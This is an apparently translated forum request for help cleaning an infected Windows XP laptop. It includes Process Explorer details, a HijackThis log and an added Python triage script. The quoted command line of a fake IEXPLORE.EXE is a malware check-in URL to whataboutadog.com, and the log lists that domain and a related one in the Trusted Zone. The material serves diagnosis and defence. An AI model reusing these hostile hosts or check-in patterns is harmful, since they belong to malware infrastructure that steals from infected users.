First of all, I wanted to give you one more piece of information:
I wanted to analyze the details of the running processes with Process Explorer, in particular the duplicated IEXPLORE.EXE process.
I'm not familiar with Process Explorer either, but I noticed at least 2 details when opening the Properties of the two processes with the same name:
code:
- genuine IEXPLORE.EXE (Properties > Image):
Path: C:\Program Files\Internet Explorer\IEXPLORE.EXE
Command Line: "C:\Program Files\Internet Explorer\IEXPLORE.EXE"
Parent: explorer.exe(2948)
- fake IEXPLORE.EXE:
Path: c:\program files\internet explorer\iexplore.exe
Command Line: http://b.whataboutadog.com/123/checkin.php?cid=34340978&aid=10258&time=C:\DOCUME~1\miocomputer\LOCALS~1\Temp\\1191002468.dat&fw=2112&v=123&m=0&vm=0
Parent: CeEKey.exe(3108)
This last one, "CeEKey.exe", corresponds to "C:\Program Files\TOSHIBA\E-KEY\bak\CeEKey.exe"
...as for the rest, the DLLs and registry keys connected to those processes, I don't understand much of it.
Here, then, is the HijackThis log...but I have to tell you that, when running "Do system scan and save log file", I got a message:
For some reason your system denied write access to the Hosts file. If any hijacked domains are in this file, HijackThis may not be able to fix this.
If that happens, you need to edit the file yourself. To do this, click Start, Run and type:
notepad C:\WINDOWS\System32\drivers\etc\hosts
and press Enter. Find the line(s) HijackThis reports and delete them. Save the file as "hosts." (with quotes), and reboot.
For VISTA: simply exit HijackThis, right-click on the HijackThis icon, choose "Run as an Administrator"
Aside from this warning, which I didn't fully understand, here is the log I obtained (I removed the corporate network address):
code:
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 23.31.21, on 28/09/2007
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Boot mode: Normal
Running processes:
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\AGRSMMSG.exe
C:\WINDOWS\System32\TCtrlIOHook.exe
C:\Program Files\CheckPoint\SecuRemote\bin\SR_GUI.exe
C:\Program Files\TOSHIBA\TOSHIBA Controls\TFncKy.exe
C:\Program Files\TOSHIBA\E-KEY\CeEKey.exe
C:\Program Files\TOSHIBA\E-KEY\bak\CeEKey.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\WINDOWS\System32\ctfmon.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\Program Files\Internet Explorer\IEXPLORE.EXE
c:\program files\internet explorer\iexplore.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.it
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: DriveLetterAccess - {5CA3D70E-1895-11CF-8E15-001234567890} - C:\WINDOWS\system32\dla\tfswshx.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [AGRSMMSG] AGRSMMSG.exe
O4 - HKLM\..\Run: [ATIPTA] C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
O4 - HKLM\..\Run: [dla] C:\WINDOWS\system32\dla\tfswctrl.exe
O4 - HKLM\..\Run: [TCtryIOHook] TCtrlIOHook.exe
O4 - HKLM\..\Run: [TFncKy] TFncKy.exe
O4 - HKLM\..\Run: [CeEKEY] C:\Program Files\TOSHIBA\E-KEY\CeEKey.exe
O4 - HKLM\..\Run: [PestPatrol Control Center] C:\Program Files\PestPatrol\PPControl.exe
O4 - HKLM\..\Run: [Realtime Monitor] C:\PROGRA~1\CA\ETRUST~1\realmon.exe -s
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [DrvMon.exe] C:\WINDOWS\System32\DrvMon.exe
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'Default user')
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O4 - Global Startup: PC Health.lnk = C:\Program Files\TOSHIBA\TOSHIBA Management Console\TOSHealthLocalS.vbs
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE
O15 - Trusted Zone: http://rete.[rete aziendale].it
O15 - Trusted Zone: *.whataboutadog.com
O15 - Trusted Zone: *.whataboutarabit.com
O15 - Trusted Zone: http://rete.[rete aziendale].it (HKLM)
PS:
While checking, I found many duplicate system files (one in its proper folder, and the duplicate in a BAK subfolder...and they often have different sizes even though the creation date is identical) ???
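The post compares two processes with the same image name and pastes a HijackThis log by hand. As an added example (not code from the poster or from the HijackThis or Process Explorer tools), the following Python script automates the three checks a responder would make on this kind of evidence: image names running from more than one directory (especially a `bak` subfolder), Trusted Zone entries outside a known allowlist, and a Process Explorer record whose command line is a URL or whose parent is not the expected shell. The sample log, the two process records and the corporate host name `rete.corp.example` are constructed to mirror the post's data, not copied from the original machine.

```python
import re
from collections import defaultdict

# Constructed sample modelled on the log quoted in the post; the corporate
# host name is a placeholder, not the poster's redacted address.
SAMPLE_LOG = r"""Logfile of Trend Micro HijackThis v2.0.2
Running processes:
C:\WINDOWS\Explorer.EXE
C:\Program Files\TOSHIBA\E-KEY\CeEKey.exe
C:\Program Files\TOSHIBA\E-KEY\bak\CeEKey.exe
C:\WINDOWS\System32\ctfmon.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
c:\program files\internet explorer\iexplore.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.it
O4 - HKLM\..\Run: [CeEKEY] C:\Program Files\TOSHIBA\E-KEY\CeEKey.exe
O15 - Trusted Zone: http://rete.corp.example
O15 - Trusted Zone: *.whataboutadog.com
O15 - Trusted Zone: *.whataboutarabit.com
O15 - Trusted Zone: http://rete.corp.example (HKLM)
"""

# Constructed Process Explorer records mirroring the two entries in the post
# (the fake one's query string is shortened to a placeholder).
GENUINE_IE = {
    "path": r"C:\Program Files\Internet Explorer\IEXPLORE.EXE",
    "command_line": r'"C:\Program Files\Internet Explorer\IEXPLORE.EXE"',
    "parent": "explorer.exe(2948)",
}
FAKE_IE = {
    "path": r"c:\program files\internet explorer\iexplore.exe",
    "command_line": "http://b.whataboutadog.com/123/checkin.php?cid=0&time=C:\\temp\\x.dat",
    "parent": "CeEKey.exe(3108)",
}

# HijackThis entry lines look like "O15 - Trusted Zone: ...", "R0 - ...", etc.
ENTRY_RE = re.compile(r"^(?P<sec>[A-Z]\d{1,2}) - (?P<body>.*)$")
# Directories that a legitimate installer does not normally run code from.
BACKUP_DIR_RE = re.compile(r"\\(bak|backup|old)\\", re.IGNORECASE)


def parse_log(text):
    """Split a HijackThis log into its running-process list and (section, body) entries."""
    processes, entries = [], []
    in_procs = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "Running processes:":
            in_procs = True
            continue
        m = ENTRY_RE.match(line)
        if m:
            in_procs = False  # first Rx/Ox entry ends the process list
            entries.append((m.group("sec"), m.group("body")))
        elif in_procs:
            processes.append(line)
    return processes, entries


def duplicate_images(processes):
    """Image names seen running from more than one directory (case-insensitive)."""
    dirs = defaultdict(set)
    for p in processes:
        directory, _, name = p.lower().rpartition("\\")
        dirs[name].add(directory)
    return {name: sorted(ds) for name, ds in dirs.items() if len(ds) > 1}


def images_in_backup_dirs(processes):
    """Running images whose path goes through a bak/backup/old directory."""
    return [p for p in processes if BACKUP_DIR_RE.search(p)]


def trusted_zone_hosts(entries):
    """Host patterns from O15 Trusted Zone entries, scheme and hive suffix removed."""
    hosts = []
    for sec, body in entries:
        if sec != "O15" or not body.startswith("Trusted Zone: "):
            continue
        host = body[len("Trusted Zone: "):]
        host = re.sub(r"\s*\((HKLM|HKCU)\)$", "", host)
        host = re.sub(r"^https?://", "", host).lower()
        hosts.append(host)
    return hosts


def unexpected_trusted_zones(entries, allowlist):
    """Trusted Zone hosts that are not on the organisation's allowlist."""
    return sorted({h for h in trusted_zone_hosts(entries) if h not in allowlist})


def check_process(detail, expected_parents=("explorer.exe",)):
    """Reasons a Process Explorer record (path, command_line, parent) looks suspicious."""
    reasons = []
    cmd = detail["command_line"].strip().strip('"')
    path = detail["path"].lower()
    parent_name = detail["parent"].split("(")[0].lower()
    if re.match(r"^https?://", cmd):
        reasons.append("command line is a URL rather than the image path")
    elif not cmd.lower().startswith(path):
        reasons.append("command line does not match the image path")
    if parent_name not in expected_parents:
        reasons.append(f"unexpected parent process {parent_name}")
    return reasons


if __name__ == "__main__":
    procs, ents = parse_log(SAMPLE_LOG)
    print("duplicate images:", duplicate_images(procs))
    print("images in backup dirs:", images_in_backup_dirs(procs))
    print("unexpected trusted zones:", unexpected_trusted_zones(ents, {"rete.corp.example"}))
    for label, rec in (("genuine", GENUINE_IE), ("fake", FAKE_IE)):
        print(label, "->", check_process(rec) or "no findings")
```

The allowlist passed to `unexpected_trusted_zones` is what turns the O15 section into a finding: a wildcard such as `*.whataboutadog.com` that nobody in the organisation added is exactly the kind of entry a responder wants surfaced rather than read past in a long log. The parent-process check is a heuristic; on a real host the expected parents depend on how the application is normally launched.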